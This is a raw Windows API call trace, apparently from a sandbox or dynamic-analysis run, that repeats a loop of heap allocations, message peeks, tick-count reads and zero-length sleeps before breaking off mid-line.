GetCurrentProcessId () returned 0xa44 [0066.473] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.473] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.473] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.473] GetTickCount () returned 0x1d25b [0066.473] GetTickCount () returned 0x1d25b [0066.473] GetTickCount () returned 0x1d25b [0066.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.473] GetTickCount () returned 0x1d25b [0066.474] Sleep (dwMilliseconds=0x0) [0066.474] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.474] GetLastError () returned 0x0 [0066.474] GetCurrentProcessId () returned 0xa44 [0066.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.474] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.474] GetTickCount () returned 0x1d25b [0066.474] GetTickCount () returned 0x1d25b [0066.474] GetTickCount () returned 0x1d25b [0066.474] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.474] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.474] GetTickCount () returned 0x1d25b [0066.474] Sleep (dwMilliseconds=0x0) [0066.474] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.474] GetLastError () returned 0x0 [0066.474] GetCurrentProcessId () returned 0xa44 [0066.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.474] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.475] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.475] GetTickCount () returned 0x1d25b [0066.475] GetTickCount () returned 0x1d25b [0066.475] GetTickCount () returned 0x1d25b [0066.475] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.475] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.475] GetTickCount () returned 0x1d25b [0066.475] Sleep (dwMilliseconds=0x0) [0066.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.475] GetLastError () returned 0x0 [0066.475] GetCurrentProcessId () returned 0xa44 [0066.475] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.475] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.475] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.475] GetTickCount () returned 0x1d25b [0066.475] GetTickCount () returned 0x1d25b [0066.475] GetTickCount () returned 0x1d25b [0066.475] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.475] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.475] GetTickCount () returned 0x1d25b [0066.476] Sleep (dwMilliseconds=0x0) [0066.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.476] GetLastError () returned 0x0 [0066.476] GetCurrentProcessId () returned 0xa44 [0066.476] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.476] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.476] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.476] GetTickCount () returned 0x1d25b [0066.476] GetTickCount () returned 0x1d25b [0066.476] GetTickCount () returned 0x1d25b [0066.476] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.476] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.476] GetTickCount () returned 0x1d25b [0066.476] Sleep (dwMilliseconds=0x0) [0066.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.476] GetLastError () returned 0x0 [0066.476] GetCurrentProcessId () returned 0xa44 [0066.476] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.476] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.476] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.476] GetTickCount () returned 0x1d25b [0066.477] GetTickCount () returned 0x1d25b [0066.477] GetTickCount () returned 0x1d25b [0066.477] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.477] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.477] GetTickCount () returned 0x1d25b [0066.477] Sleep (dwMilliseconds=0x0) [0066.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.477] GetLastError () returned 0x0 [0066.477] GetCurrentProcessId () returned 0xa44 [0066.477] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.477] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.477] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.477] GetTickCount () returned 0x1d25b [0066.477] GetTickCount () returned 0x1d25b [0066.477] GetTickCount () returned 0x1d25b [0066.477] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.477] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.477] GetTickCount () returned 0x1d25b [0066.477] Sleep (dwMilliseconds=0x0) [0066.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.478] GetLastError () returned 0x0 [0066.478] GetCurrentProcessId () returned 0xa44 [0066.478] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.478] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.478] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.478] GetTickCount () returned 0x1d25b [0066.478] GetTickCount () returned 0x1d25b [0066.478] GetTickCount () returned 0x1d25b [0066.478] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.478] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.478] GetTickCount () returned 0x1d25b [0066.478] Sleep (dwMilliseconds=0x0) [0066.478] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.478] GetLastError () returned 0x0 [0066.478] GetCurrentProcessId () returned 0xa44 [0066.478] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.478] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.478] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.478] GetTickCount () returned 0x1d25b [0066.478] GetTickCount () returned 0x1d25b [0066.478] GetTickCount () returned 0x1d25b [0066.478] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.479] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.479] GetTickCount () returned 0x1d25b [0066.479] Sleep (dwMilliseconds=0x0) [0066.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.479] GetLastError () returned 0x0 [0066.479] GetCurrentProcessId () returned 0xa44 [0066.479] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.479] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.479] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.479] GetTickCount () returned 0x1d25b [0066.479] GetTickCount () returned 0x1d25b [0066.479] GetTickCount () returned 0x1d25b [0066.479] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.479] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.479] GetTickCount () returned 0x1d25b [0066.479] Sleep (dwMilliseconds=0x0) [0066.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.479] GetLastError () returned 0x0 [0066.480] GetCurrentProcessId () returned 0xa44 [0066.480] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.480] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.480] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.480] GetTickCount () returned 0x1d25b [0066.480] GetTickCount () returned 0x1d25b [0066.480] GetTickCount () returned 0x1d25b [0066.480] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.480] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.480] GetTickCount () returned 0x1d25b [0066.480] Sleep (dwMilliseconds=0x0) [0066.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.480] GetLastError () returned 0x0 [0066.480] GetCurrentProcessId () returned 0xa44 [0066.480] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.480] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.480] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.480] GetTickCount () returned 0x1d25b [0066.480] GetTickCount () returned 0x1d25b [0066.480] GetTickCount () returned 0x1d25b [0066.480] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.480] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.480] GetTickCount () returned 0x1d25b [0066.481] Sleep (dwMilliseconds=0x0) [0066.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.481] GetLastError () returned 0x0 [0066.481] GetCurrentProcessId () returned 0xa44 [0066.481] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.481] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.481] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.481] GetTickCount () returned 0x1d25b [0066.481] GetTickCount () returned 0x1d25b [0066.481] GetTickCount () returned 0x1d25b [0066.481] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.481] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.481] GetTickCount () returned 0x1d25b [0066.481] Sleep (dwMilliseconds=0x0) [0066.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.481] GetLastError () returned 0x0 [0066.481] GetCurrentProcessId () returned 0xa44 [0066.481] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.481] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.481] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.481] GetTickCount () returned 0x1d25b [0066.482] GetTickCount () returned 0x1d25b [0066.482] GetTickCount () returned 0x1d25b [0066.482] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.482] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.482] GetTickCount () returned 0x1d25b [0066.482] Sleep (dwMilliseconds=0x0) [0066.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.482] GetLastError () returned 0x0 [0066.482] GetCurrentProcessId () returned 0xa44 [0066.482] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.482] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.482] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.482] GetTickCount () returned 0x1d25b [0066.482] GetTickCount () returned 0x1d25b [0066.482] GetTickCount () returned 0x1d25b [0066.482] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.482] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.482] GetTickCount () returned 0x1d25b [0066.482] Sleep (dwMilliseconds=0x0) [0066.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.483] GetLastError () returned 0x0 [0066.483] GetCurrentProcessId () returned 0xa44 [0066.483] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.483] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.483] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.483] GetTickCount () returned 0x1d25b [0066.483] GetTickCount () returned 0x1d25b [0066.483] GetTickCount () returned 0x1d25b [0066.483] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.483] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.483] GetTickCount () returned 0x1d25b [0066.483] Sleep (dwMilliseconds=0x0) [0066.483] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.483] GetLastError () returned 0x0 [0066.483] GetCurrentProcessId () returned 0xa44 [0066.483] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.484] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.484] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.484] GetTickCount () returned 0x1d25b [0066.484] GetTickCount () returned 0x1d25b [0066.484] GetTickCount () returned 0x1d25b [0066.484] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.484] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.484] GetTickCount () returned 0x1d25b [0066.484] Sleep (dwMilliseconds=0x0) [0066.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.484] GetLastError () returned 0x0 [0066.484] GetCurrentProcessId () returned 0xa44 [0066.484] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.484] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.484] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.484] GetTickCount () returned 0x1d25b [0066.484] GetTickCount () returned 0x1d25b [0066.484] GetTickCount () returned 0x1d25b [0066.485] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.485] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.485] GetTickCount () returned 0x1d25b [0066.485] Sleep (dwMilliseconds=0x0) [0066.485] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.485] GetLastError () returned 0x0 [0066.485] GetCurrentProcessId () returned 0xa44 [0066.485] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.485] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.485] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.485] GetTickCount () returned 0x1d25b [0066.485] GetTickCount () returned 0x1d25b [0066.485] GetTickCount () returned 0x1d25b [0066.485] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.485] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.485] GetTickCount () returned 0x1d25b [0066.486] Sleep (dwMilliseconds=0x0) [0066.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.486] GetLastError () returned 0x0 [0066.486] GetCurrentProcessId () returned 0xa44 [0066.486] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.486] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.486] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.486] GetTickCount () returned 0x1d25b [0066.486] GetTickCount () returned 0x1d25b [0066.486] GetTickCount () returned 0x1d25b [0066.486] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.486] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.486] GetTickCount () returned 0x1d25b [0066.486] Sleep (dwMilliseconds=0x0) [0066.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.486] GetLastError () returned 0x0 [0066.487] GetCurrentProcessId () returned 0xa44 [0066.487] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.487] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.487] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.487] GetTickCount () returned 0x1d25b [0066.487] GetTickCount () returned 0x1d25b [0066.487] GetTickCount () returned 0x1d25b [0066.487] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.487] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.487] GetTickCount () returned 0x1d25b [0066.487] Sleep (dwMilliseconds=0x0) [0066.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.487] GetLastError () returned 0x0 [0066.487] GetCurrentProcessId () returned 0xa44 [0066.487] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.487] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.488] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.488] GetTickCount () returned 0x1d25b [0066.488] GetTickCount () returned 0x1d25b [0066.488] GetTickCount () returned 0x1d25b [0066.488] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.488] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.488] GetTickCount () returned 0x1d25b [0066.488] Sleep (dwMilliseconds=0x0) [0066.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.488] GetLastError () returned 0x0 [0066.488] GetCurrentProcessId () returned 0xa44 [0066.488] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.488] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.488] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.488] GetTickCount () returned 0x1d25b [0066.488] GetTickCount () returned 0x1d25b [0066.488] GetTickCount () returned 0x1d25b [0066.489] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.489] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.489] GetTickCount () returned 0x1d25b [0066.489] Sleep (dwMilliseconds=0x0) [0066.489] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.489] GetLastError () returned 0x0 [0066.489] GetCurrentProcessId () returned 0xa44 [0066.489] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.489] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.489] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.489] GetTickCount () returned 0x1d25b [0066.489] GetTickCount () returned 0x1d25b [0066.489] GetTickCount () returned 0x1d25b [0066.489] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.489] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.489] GetTickCount () returned 0x1d25b [0066.490] Sleep (dwMilliseconds=0x0) [0066.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.490] GetLastError () returned 0x0 [0066.490] GetCurrentProcessId () returned 0xa44 [0066.490] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.490] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.490] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.490] GetTickCount () returned 0x1d25b [0066.490] GetTickCount () returned 0x1d25b [0066.490] GetTickCount () returned 0x1d25b [0066.490] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.491] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.491] GetTickCount () returned 0x1d25b [0066.491] Sleep (dwMilliseconds=0x0) [0066.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.491] GetLastError () returned 0x0 [0066.491] GetCurrentProcessId () returned 0xa44 [0066.491] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.491] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.491] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.491] GetTickCount () returned 0x1d25b [0066.491] GetTickCount () returned 0x1d25b [0066.491] GetTickCount () returned 0x1d25b [0066.491] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.492] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.492] GetTickCount () returned 0x1d25b [0066.492] Sleep (dwMilliseconds=0x0) [0066.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.492] GetLastError () returned 0x0 [0066.492] GetCurrentProcessId () returned 0xa44 [0066.492] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.492] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.492] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.492] GetTickCount () returned 0x1d25b [0066.492] GetTickCount () returned 0x1d25b [0066.492] GetTickCount () returned 0x1d25b [0066.492] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.492] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.492] GetTickCount () returned 0x1d25b [0066.493] Sleep (dwMilliseconds=0x0) [0066.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.493] GetLastError () returned 0x0 [0066.493] GetCurrentProcessId () returned 0xa44 [0066.493] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.493] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.493] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.493] GetTickCount () returned 0x1d26b [0066.493] GetTickCount () returned 0x1d26b [0066.493] GetTickCount () returned 0x1d26b [0066.493] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.493] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.493] GetTickCount () returned 0x1d26b [0066.493] Sleep (dwMilliseconds=0x0) [0066.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.494] GetLastError () returned 0x0 [0066.494] GetCurrentProcessId () returned 0xa44 [0066.494] RtlAllocateHeap 